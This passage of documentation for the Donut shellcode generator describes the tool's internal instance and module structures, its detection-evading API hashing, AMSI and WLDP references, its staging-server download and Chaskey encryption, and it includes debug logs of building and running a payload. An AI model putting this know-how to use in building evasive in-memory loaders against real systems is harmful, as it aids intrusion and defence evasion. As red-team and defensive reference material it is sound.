120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
